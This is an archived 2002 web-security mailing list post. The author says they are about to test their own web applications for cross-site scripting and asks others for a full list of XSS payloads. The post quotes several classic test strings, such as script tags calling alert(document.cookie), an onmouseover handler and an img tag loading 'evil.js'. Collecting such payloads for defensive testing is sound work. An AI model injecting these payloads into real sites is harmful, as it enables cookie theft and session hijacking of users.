WebApp Sec mailing list archives
XSS Strings
From: securityarchitect () hush com
Date: Sun, 15 Dec 2002 23:54:52 -0800
Maybe more for vuln-dev but I have bitten the bullet and pulled out wget and perl and am gonna start testing my apps for XSS and I need to build the ultimate list of payloads. For the html tags period I guess its the classic; <script>alert(document.cookie)</script> <a href="X" onmouseover="alert(document.cookie"> <javascript ="http://www.host/script.js" "javascript:alert(document.cookie)" <iframe = c:\> <img src = "evil.js"> But I seem to recall some old versions of Netscape run the { etc Does anyone have a good list of payloads that will cover the majority of the options ? Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Big $$$ to be made with the HushMail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427
Current thread:
- XSS Strings securityarchitect (Dec 16)
- Re: XSS Strings Martin Eiszner (Dec 16)
- Re: XSS Strings Jeroen Latour (Dec 16)
- RE: XSS Strings Glyn (Dec 16)
- Re: XSS Strings Tomas (Dec 16)
- encoder N30 (Dec 19)
- Re: encoder Kevin Spett (Dec 19)
- encoder N30 (Dec 19)